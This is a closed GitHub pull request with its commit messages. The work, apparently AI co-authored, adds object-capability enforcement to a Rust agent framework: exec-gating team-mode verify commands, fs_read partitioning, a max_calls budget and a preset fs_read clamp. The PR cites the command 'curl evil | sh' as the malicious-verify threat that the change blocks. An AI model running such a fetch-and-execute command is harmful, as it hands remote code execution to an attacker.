feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) #765

Closed
hartsock wants to merge 1 commit into feat/ocap-4-crew-budget from feat/ocap-5-team-verify

Conversation

@hartsock

Member

OCAP enforcement-floor stack — PR 5 of 8 · epic #749

Stacked on step 4 (#760); review and merge after #760. This completes the core of complete mediation (steps 2–5): the .meet() seam plus enforcement on fs_read, max_calls, and now the team-mode verify. Full order: #749.

What this does

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with no exec check — a malicious verify (curl evil | sh) ran ungated (T2 verify-as-payload, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it).
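
The gate described above can be sketched as follows. This is a minimal illustration, not the code in team.rs: only the names `permits_exec` and `set_test_command` come from this PR, while `ExecScope`, the `Caveats` and `Workspace` shapes, `install_verify`, and the exact-string matching rule are assumptions made for the example.

```rust
use std::collections::BTreeSet;

/// Hypothetical stand-in for the exec axis of a caveat set.
#[derive(Debug, Clone)]
enum ExecScope {
    /// No clamp: every command is permitted.
    All,
    /// Only the listed commands are permitted (exact-string match, an assumption).
    Only(BTreeSet<String>),
}

/// Hypothetical stand-in for the caveats consulted by `run_team`.
#[derive(Debug, Clone)]
struct Caveats {
    exec: ExecScope,
}

impl Caveats {
    /// True when `command` is allowed on the exec axis.
    fn permits_exec(&self, command: &str) -> bool {
        match &self.exec {
            ExecScope::All => true,
            ExecScope::Only(allowed) => allowed.contains(command),
        }
    }
}

/// Hypothetical workspace that remembers which test command is installed.
#[derive(Debug)]
struct Workspace {
    test_command: String,
}

impl Workspace {
    fn set_test_command(&mut self, command: &str) {
        self.test_command = command.to_string();
    }
}

/// Gate a lead-authored verify before installing it.
/// Returns `None` when the verify was installed, or `Some(note)` when it was refused.
fn install_verify(caveats: &Caveats, ws: &mut Workspace, verify: &str) -> Option<String> {
    if caveats.permits_exec(verify) {
        ws.set_test_command(verify);
        None
    } else {
        // Refused, not run: the workspace default check stays in place.
        Some(format!(
            "verify `{}` refused by the exec caveat; keeping `{}`",
            verify, ws.test_command
        ))
    }
}
```

With an allowlist containing only `check-a`, calling `install_verify` with `check-b` leaves the workspace's existing test command untouched and returns a note, while `check-a` is installed and returns `None`.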

Test plan

denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

🤖 Generated with Claude Code

…is (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify
(team.rs run_team) was installed as the test command with NO exec check — a malicious verify
(curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now
caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run
(not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the
same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is
NOT installed, check-a is (red on today's code — both installed; green after). RED verified by
revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@hartsock

Member Author

Superseded by #781 — steps 3–6 collapsed onto current main after #751 merged + auto-closed the stack. Code is identical; review/merge there.

@hartsock hartsock closed this Jun 29, 2026
hartsock added a commit that referenced this pull request Jun 29, 2026
…lls, team-verify, clamp grammar (#749) (#781)

* feat(ocap): crew.rs enforces fs_read — complete mediation for reads (#752)

OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751). The crew CURATE stage read
navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the
navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the
permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never
passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read
caveat: ..."), so a clamped read fails visibly.

TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is
not read, the in-scope one is (red on today's code — both read; green after). just check green
(52 newt-scheduler tests, +1).

Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read
scope is a separate algebra refinement (follow-up). This PR wires the existing predicate.
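
A rough sketch of the read partition, under stated assumptions: `permits_fs_read` and the wording of the note come from the message above, while `ReadScope`, `partition_readable`, and `denial_note` are hypothetical names used only here. Membership is exact-string, as the note says, so a directory prefix does not grant access to files beneath it.

```rust
/// Hypothetical stand-in for the fs_read axis of a caveat set.
#[derive(Debug, Clone)]
enum ReadScope {
    /// No clamp: every path is readable.
    All,
    /// Only these exact path strings are readable (no prefix or glob matching).
    Only(Vec<String>),
}

impl ReadScope {
    /// True when `path` is readable under this scope.
    fn permits_fs_read(&self, path: &str) -> bool {
        match self {
            ReadScope::All => true,
            ReadScope::Only(paths) => paths.iter().any(|p| p.as_str() == path),
        }
    }
}

/// Split the navigator's files into (readable, denied).
/// Only the first list would ever be handed to the workspace reader.
fn partition_readable(scope: &ReadScope, relevant_files: &[String]) -> (Vec<String>, Vec<String>) {
    relevant_files
        .iter()
        .cloned()
        .partition(|path| scope.permits_fs_read(path))
}

/// Build the user-facing note for denied files, or `None` when nothing was denied.
fn denial_note(denied: &[String]) -> Option<String> {
    if denied.is_empty() {
        None
    } else {
        Some(format!(
            "{} file(s) not readable under your fs_read caveat: {}",
            denied.len(),
            denied.join(", ")
        ))
    }
}
```

Partitioning before reading, rather than filtering read errors afterwards, keeps denied paths from ever reaching the reader and makes the denial visible to the user.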

Fixes #752. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): crew enforces max_calls — complete mediation for the call budget (#753)

OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759). The crew loop bounded work only by
cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults
caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the
budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success).
The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is
now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default)
leaves unclamped crews unchanged.
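
To illustrate the budget check, here is a simplified loop. `CountBound`, `permits_one_more`, `calls_used`, and `NeedsHumanReview` are named in the message above; the `Exit` enum, `run_crew`, the fixed three dispatches per attempt, and the fact that no attempt ever succeeds are assumptions made to keep the sketch small.

```rust
/// Call budget; the variant names follow the commit message.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum CountBound {
    Unlimited,
    AtMost(u32),
}

impl CountBound {
    /// True when one more call is allowed after `used` calls have been made.
    fn permits_one_more(&self, used: u32) -> bool {
        match self {
            CountBound::Unlimited => true,
            CountBound::AtMost(limit) => used < *limit,
        }
    }
}

/// Hypothetical exit reasons for the sketch; neither is reported as success.
#[derive(Debug, PartialEq, Eq)]
enum Exit {
    /// The attempt ceiling was reached first.
    AttemptsExhausted,
    /// The call budget denied a dispatch.
    NeedsHumanReview,
}

/// Simplified crew loop: every attempt dispatches navigate, plan, and triage.
/// Returns the exit reason and the number of model dispatches performed.
fn run_crew(max_calls: CountBound, max_attempts: u32) -> (Exit, u32) {
    let mut calls_used = 0u32;
    for _attempt in 0..max_attempts {
        for _role in ["navigate", "plan", "triage"] {
            // Consult the budget before each dispatch, never after.
            if !max_calls.permits_one_more(calls_used) {
                return (Exit::NeedsHumanReview, calls_used);
            }
            calls_used += 1; // the model dispatch would happen here
        }
    }
    (Exit::AttemptsExhausted, calls_used)
}
```

Because the check runs before every dispatch, `AtMost(0)` stops the crew before the first navigator call, and `Unlimited` leaves the attempt ceiling as the only bound.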

net: documented in-code — the crew loop has no direct net effect a permits_net check could gate;
net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate
(per-axis complete mediation: this axis needs a sandbox, not a call-site).

TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with
max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green —
0). RED verified by neutralizing the gates. just check green.

Fixes #753. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify
(team.rs run_team) was installed as the test command with NO exec check — a malicious verify
(curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now
caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run
(not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the
same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is
NOT installed, check-a is (red on today's code — both installed; green after). RED verified by
revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): NamedPermissionPreset can clamp fs_read — clamp-grammar fix (#755)

OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765). The M6 grammar gap: a preset could
not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though
CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec>
(serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile
lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified.
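
The lowering can be pictured like this. The type and method names (`NamedPermissionPreset`, `ScopeSpec`, `CaveatProfile`, `to_caveat_profile`) come from the message above, but the field layout is an assumption, and the real struct is deserialized with serde, which this dependency-free sketch replaces with `Default`.

```rust
/// Simplified scope: `All` is the default, as described in the commit message.
#[derive(Debug, Clone, PartialEq, Eq)]
enum ScopeSpec {
    All,
    Only(Vec<String>),
}

impl Default for ScopeSpec {
    fn default() -> Self {
        ScopeSpec::All
    }
}

/// Hypothetical, trimmed-down preset: only the fields needed for the example.
#[derive(Debug, Clone, Default)]
struct NamedPermissionPreset {
    name: String,
    /// `None` means the preset does not mention fs_read, which lowers to `All`.
    fs_read: Option<ScopeSpec>,
}

/// Hypothetical, trimmed-down profile carrying just the fs_read axis.
#[derive(Debug, Clone, PartialEq, Eq)]
struct CaveatProfile {
    fs_read: ScopeSpec,
}

impl NamedPermissionPreset {
    /// Lower the preset: `Some(scope)` narrows reads, `None` keeps the old behavior.
    fn to_caveat_profile(&self) -> CaveatProfile {
        CaveatProfile {
            fs_read: self.fs_read.clone().unwrap_or_default(),
        }
    }
}
```

A preset built with `..Default::default()` and no `fs_read` lowers to `ScopeSpec::All`, which is the back-compat case; one carrying `Some(ScopeSpec::Only(...))` lowers to that narrower scope.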

Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp —
follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity;
default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default —
flipping it would break back-compat for every preset consumer).
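
The meet-identity remark can be made concrete with a toy lattice. This assumes the meet of two scopes is set intersection with `All` as the top element; the actual `.meet()` implementation is not shown in this PR, and `Scope` here is a hypothetical type.

```rust
use std::collections::BTreeSet;

/// Hypothetical scope lattice: `All` is top, `Only(set)` narrows.
#[derive(Debug, Clone, PartialEq, Eq)]
enum Scope {
    All,
    Only(BTreeSet<String>),
}

impl Scope {
    /// Greatest lower bound: the most permissive scope allowed by both sides.
    fn meet(&self, other: &Scope) -> Scope {
        match (self, other) {
            // `All` is the identity: meeting with it changes nothing.
            (Scope::All, s) | (s, Scope::All) => s.clone(),
            // Two allowlists meet at their intersection.
            (Scope::Only(a), Scope::Only(b)) => {
                Scope::Only(a.intersection(b).cloned().collect())
            }
        }
    }
}
```

Under this reading, an un-annotated subtask whose clamp is `All` inherits its parent's scope unchanged, which is why a default-deny would have to be introduced deliberately elsewhere rather than by changing the general default.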

TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat
(omitted fs_read => All) + config-parse. RED verified by revert. just check green.

Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test
fixtures); behavior-preserving (consumer literals use ..default()).

Fixes #755. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com>
Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
@hartsock hartsock deleted the feat/ocap-5-team-verify branch June 29, 2026 23:26

Labels

ocap Object-capability / authority-security; pending full design review
